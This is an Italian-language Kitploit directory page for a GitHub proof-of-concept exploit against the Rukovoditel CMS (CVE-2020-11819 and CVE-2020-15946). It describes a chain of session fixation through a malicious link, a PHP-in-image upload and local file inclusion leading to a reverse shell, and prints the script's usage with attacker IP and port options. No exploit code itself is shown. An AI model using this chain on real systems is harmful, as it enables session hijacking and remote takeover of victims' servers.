Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PoC-RCE-Rukovoditel — Prova di concetto per CVE-2020-11819 e CVE-2020-15946 | Kitploit
Strumenti/GitHubGitHub/danyx07/poc-rce-rukovoditel
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubdanyx07/poc-rce-rukovoditel

PoC-RCE-Rukovoditel

Prova di concetto per CVE-2020-11819 e CVE-2020-15946

Vedi Repository
5 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC-RCE-Rukovoditel

Prova di concetto per CVE-2020-11819 e CVE-2020-15946. Testato su Rukovoditel 2.4.x, 2.5.x e 2.6.1

Descrizione:

Questo exploit ha due modalità di esecuzione, usando la vulnerabilità di session fixation (CVE-2020-15946) o utilizzando le credenziali di accesso di qualsiasi account sotto qualsiasi profilo. Con l'opzione --type L, questo script creerà un link malevolo, se la vittima accede al link tramite un browser, verrà impostato un identificatore di sessione arbitrario che verrà utilizzato per rubare la loro sessione dopo aver caricato un'immagine con contenuto PHP nel loro profilo fotografico, e quindi utilizzare local file include (CVE-2020-11819) per ottenere una bella reverse shell oppure, con le opzioni --type C -u -p puoi fornire le credenziali, caricare l'immagine con contenuto PHP e utilizzare la local file inclusion (CVE-2020-11819) per ottenere l'esecuzione del codice.

Consiglio: ricordati di verificare se il modulo di registrazione è abilitato ;)

Utilizzo

exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]

RCE post-autenticazione per rukovoditel, versione script 1.0

optional arguments:
-h, --help mostra questo messaggio di aiuto ed esce
-t URL, --target URL URL/Percorso completo del CMS Rukovoditel http://url/path/to/cms/
-u USER, --user USER Nome utente per l'autenticazione
-p PASSWORD, --password PASSWORD Password per l'autenticazione
-a TYPE, --type TYPE Usa -a L per generare il link e rubare la sessione o usa -a C se disponi di credenziali di accesso all'applicazione web
--ip IP_ATTACKER IP dell'attaccante per la reverse shell!
--port PORT_ATTACKER Porta per la connessione della reverse shell
--proxy PROXY Imposta un proxy http per il debug http://127.0.0.1:8080

Scarica lo strumento